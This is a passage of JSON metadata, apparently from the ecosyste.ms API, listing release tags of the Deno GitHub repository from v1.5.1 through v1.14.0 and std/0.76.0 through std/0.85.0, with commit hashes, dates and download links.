b0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"